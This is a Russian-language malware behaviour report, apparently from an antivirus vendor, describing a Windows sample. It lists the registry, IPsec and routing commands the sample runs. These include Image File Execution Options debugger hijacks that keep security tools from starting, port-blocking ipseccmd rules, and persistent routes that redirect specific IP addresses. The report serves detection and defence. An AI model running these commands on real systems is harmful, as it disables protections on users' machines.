Техническая информация
Для обеспечения автозапуска и распространения:
Модифицирует следующие ключи реестра:
- [<HKLM>\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\SohuNews.exe] 'Debugger' = 'ntsd -d # SohuNews.exe '
- [<HKLM>\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\weday.exe] 'Debugger' = 'ntsd -d # weday.exe '
- [<HKLM>\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\ImeUtil.exe] 'Debugger' = 'ntsd -d # ImeUtil.exe'
- [<HKLM>\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\PinyinUp.exe] 'Debugger' = 'ntsd -d # PinyinUp.exe'
- [<HKLM>\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\QQPYLiveup.exe] 'Debugger' = 'ntsd -d # QQPYLiveup.exe '
- [<HKLM>\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\QQPCDetector.exe] 'Debugger' = 'ntsd -d # QQPCDetector.exe '
- [<HKLM>\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\janisa.exe] 'Debugger' = 'ntsd -d # janisa.exe '
- [<HKLM>\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\Safe.exe] 'Debugger' = 'ntsd -d # Safe.exe '
Создает следующие сервисы:
- [<HKLM>\SYSTEM\ControlSet001\Services\PolicyAgent] 'Start' = '00000002'
Вредоносные функции:
Создает и запускает на исполнение:
- %WINDIR%\ipseccmd.exe -w REG -p "jw Safe" -r "Block TCP/445" -f *+0:445:TCP -n BLOCK -x
- %WINDIR%\ipseccmd.exe -w REG -p "jw Safe" -r "Block TCP/1443" -f *+0:1443:TCP -n BLOCK -x
- %WINDIR%\ipseccmd.exe -w REG -p "jw Safe" -r "Block TCP/1444" -f *+0:1444:TCP -n BLOCK -x
- %WINDIR%\ipseccmd.exe -w REG -p "jw Safe" -o -x
- %WINDIR%\ipseccmd.exe -w REG -p "jw Safe" -r "Block TCP/135" -f *+0:135:TCP -n BLOCK -x
- %WINDIR%\ipseccmd.exe -w REG -p "jw Safe" -r "Block TCP/139" -f *+0:139:TCP -n BLOCK -x
Запускает на исполнение:
- <SYSTEM32>\route.exe /p add 58.221.39.212 mask 255.255.255.255 192.168.1.0
- <SYSTEM32>\route.exe /p add 58.221.39.211 mask 255.255.255.255 192.168.1.0
- <SYSTEM32>\route.exe /p add 58.221.39.214 mask 255.255.255.255 192.168.1.0
- <SYSTEM32>\route.exe /p add 58.221.39.213 mask 255.255.255.255 192.168.1.0
- <SYSTEM32>\route.exe /p add 58.221.39.208 mask 255.255.255.255 192.168.1.0
- <SYSTEM32>\route.exe /p add 58.221.39.207 mask 255.255.255.255 192.168.1.0
- <SYSTEM32>\route.exe /p add 58.221.39.210 mask 255.255.255.255 192.168.1.0
- <SYSTEM32>\route.exe /p add 58.221.39.209 mask 255.255.255.255 192.168.1.0
- <SYSTEM32>\route.exe /p add 58.221.39.215 mask 255.255.255.255 192.168.1.0
- <SYSTEM32>\find.exe /i "PolicyAgent"
- <SYSTEM32>\sc.exe query PolicyAgent
- <SYSTEM32>\sc.exe start PolicyAgent Services
- <SYSTEM32>\sc.exe config PolicyAgent start= auto
- <SYSTEM32>\regsvr32.exe /u /s igfxpph.dll
- <SYSTEM32>\route.exe /p add 58.221.37.125 mask 255.255.255.255 192.168.1.0
- <SYSTEM32>\reg.exe add HKEY_CLASSES_ROOT\Directory\Background\shellex\ContextMenuHandlers\new /ve /d {D969A300-E7FF-11d0-A93B-00A0C90F2719}
- <SYSTEM32>\reg.exe delete HKEY_CLASSES_ROOT\Directory\Background\shellex\ContextMenuHandlers /f
- <SYSTEM32>\route.exe /p add 58.221.39.206 mask 255.255.255.255 192.168.1.0
- <SYSTEM32>\reg.exe add "HKEY_CURRENT_USER\Software\Blizzard Entertainment\Warcraft III\Sound" /v provider /t REG_SZ /d 1 /f
- <SYSTEM32>\reg.exe add "HKEY_CURRENT_USER\Software\Blizzard Entertainment\Warcraft III\Sound" /v positional /t REG_SZ /d 0 /f
- <SYSTEM32>\reg.exe add "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\QQPYLiveup.exe" /v "Debugger" /t REG_SZ /d "ntsd -d # QQPYLiveup.exe " /f
- <SYSTEM32>\reg.exe add "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\QQPCDetector.exe" /v "Debugger" /t REG_SZ /d "ntsd -d # QQPCDetector.exe " /f
- <SYSTEM32>\regsvr32.exe TXFTNActiveX.dll /s
- <SYSTEM32>\cmd.exe /c %WINDIR%\QQ6697646.bat
- <SYSTEM32>\reg.exe add HKlM\SYSTEM\CurrentControlSet\Control\CrashControl /v "AutoReboot" /t REG_DWORD /d 1 /f
- <SYSTEM32>\reg.exe add HKlM\SYSTEM\ControlSet001\Control\CrashControl /v "AutoReboot" /t REG_DWORD /d 1 /f
- <SYSTEM32>\reg.exe add "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\Safe.exe" /v "Debugger" /t REG_SZ /d "ntsd -d # Safe.exe " /f
- <SYSTEM32>\route.exe /p add 58.221.39.196 mask 255.255.255.255 192.168.1.0
- <SYSTEM32>\reg.exe add "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\ImeUtil.exe" /v "Debugger" /t REG_SZ /d "ntsd -d # ImeUtil.exe" /f
- <SYSTEM32>\route.exe /p add 58.221.39.205 mask 255.255.255.255 192.168.1.0
- <SYSTEM32>\route.exe /p add 58.221.39.204 mask 255.255.255.255 192.168.1.0
- <SYSTEM32>\reg.exe add "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\weday.exe" /v "Debugger" /t REG_SZ /d "ntsd -d # weday.exe " /f
- <SYSTEM32>\reg.exe add "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\janisa.exe" /v "Debugger" /t REG_SZ /d "ntsd -d # janisa.exe " /f
- <SYSTEM32>\reg.exe add "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\PinyinUp.exe" /v "Debugger" /t REG_SZ /d "ntsd -d # PinyinUp.exe" /f
- <SYSTEM32>\reg.exe add "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\SohuNews.exe" /v "Debugger" /t REG_SZ /d "ntsd -d # SohuNews.exe " /f
Изменения в файловой системе:
Создает следующие файлы:
- %WINDIR%\winipsec.dll
- <SYSTEM32>\TXFTNActiveX.dll
- %WINDIR%\QQ6697646.bat
- %WINDIR%\xplore.exe
- %WINDIR%\ipseccmd.exe
Удаляет следующие файлы:
- %TEMP%\~DF4A32.tmp
- %WINDIR%\Tasks\SA.DAT
- %WINDIR%\Tasks\desktop.ini
